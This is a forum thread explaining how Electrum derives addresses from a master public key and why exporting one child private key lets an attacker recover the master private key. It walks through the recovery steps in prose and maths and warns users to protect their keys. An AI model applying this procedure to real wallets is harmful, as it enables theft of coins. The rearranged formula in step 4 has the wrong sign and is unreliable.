Topic: [How Electrum Works] Why you should be careful with your private keys. - page 3. (Read 9303 times)

http://bitcoinmagazine.com/8396/deterministic-wallets-advantages-flaw/

https://github.com/spesmilo/electrum/blob/master/lib/account.py#L148

Nice catch. Fixed the OP.

The only valid reason I can think of, would be to do an off chain transaction.  But in that case, it should be the only coins in the electrum wallet, and therefore, why not simply give someone the seed?

Thanks for the explanation.

I've seen you mention this topic many times around here lately, so it's great to finally be able to be able to quantify why this occurs.

I feel like keys simply should never be exported because of this, why would anyone ever want to take this risk?

Thanks Debura.

Btw, 10,000 or 100,000?

Hi all,

In another thread, it seemed that not many people are aware (even though there is a warning message when you export a private key from a seeded address) of the (MPK + privkey_n = Master Private Key (mpk)) quirk.

I'm here to explain it.

First, some clarification.

Your seed is not your Master Private Key. Your seed is "stretched" out 100,000 times by hashing it against itself and subsequent hashes. The final hash that arises from this process is your "Master Private Key" or Extended Private Key. This is the private key to your Master Public Key.

Now that you understand this, here's some basic ECC math:

For a private-public keypair d = private, P = Public, the formula that calculates the public key from the private key is P = dG... where G is the "generator point" on the curve that Bitcoin uses for Elliptic Curve calculations. All keypairs in Bitcoin use the same Generator point G.

This relationship of P = dG is important to understand how the attack takes place.


First let's learn about Electrum's address derivation.

Well, the address derivation formula works something like this:

1. We first create an "s" which is = Hash( n:c:MPK ) where n = the index number of the address (0 = first address, 1 = second address, etc.) and c = Change addresses or not. (1 = change, 0 = regular) and MPK = your master public key.
2. Then we take that hash, use it as a private key against the generator point to get a public key R = sG
3. Then we take the master public key and add it to the sequence public key. This gives us a 3rd public key without needing to know its private key or the master private key, we will call this P_n = d_nG

Notice how nowhere in that process did I use the master private key or the private key to P_n.

Now, how do I spend bitcoins for the address at P_n?

1. I stretch the seed 100,000 times to get the Master private key.
2. Since P_n = MPK + R... we can also write the equation as d_nG = mpkG + sG.... G cancels out to get d_n = mpk + s
3. We add the master private key to the Sequence "s" (and mod by the curve order) to get d_n... with this, we can sign for the address at P_n

......

Ok, now that we understand what's going on, how are we vulnerable?

First, what does the attacker need?

1. Your Master Public Key.
2. Any one of the private keys from an individual address derived from your Master Public(/private) Key.

How do they attack you?

I know 100% that your MPK is correct, I know 100% that the private key I obtained is from that MPK's address. Normally people don't use a lot of addresses on Electrum, so even if we don't know the sequence number, we could try about 100 times and most likely find the right sequence.

Here's what I do:
1. I calculate the Bitcoin address from your private key, public key is X.
2. I attempt to guess, let's say I get it right that your number was Hash( 0:0:MPK ). Because I know your MPK and I guessed the index of your private key, I now have the sequence secret.
3. I created the public key for the sequence secret, and add it to your Master Public Key. If the end result is X, I have correctly found the sequence secret. If not, just keep guessing, its fast.
4. As we said before, private key derivation is d₀ = mpk + s... so we change it around to mpk = s - d₀
5. We know the sequence secret now, and the Bitcoin address private key. we subtract the private key from the sequence secret, modding by the curve order, we get the master private key.
6. Just in case, check if MPK = mpk * G. If it does, now you can solve any sequence address's private key.


So everyone, please treat every single individual private key on your seed's wallet as carefully as you would treat your seed.


BIP32 has the same problem, however, it also has something called "hardened keys." Which are supposed to break the chain (so you can only derive it one way) but at the expense of utility. (You won't be able to derive deeper chains from that child)


That being said. Electrum's offline signing ability and its lightweight client make it my favorite Bitcoin client to date. Just be sure to educate yourself. The same can be said with anything in life, especially Bitcoin related things, but it always helps to learn.


I hope this helps prevent theft. Please take care of your private keys.

Thank you.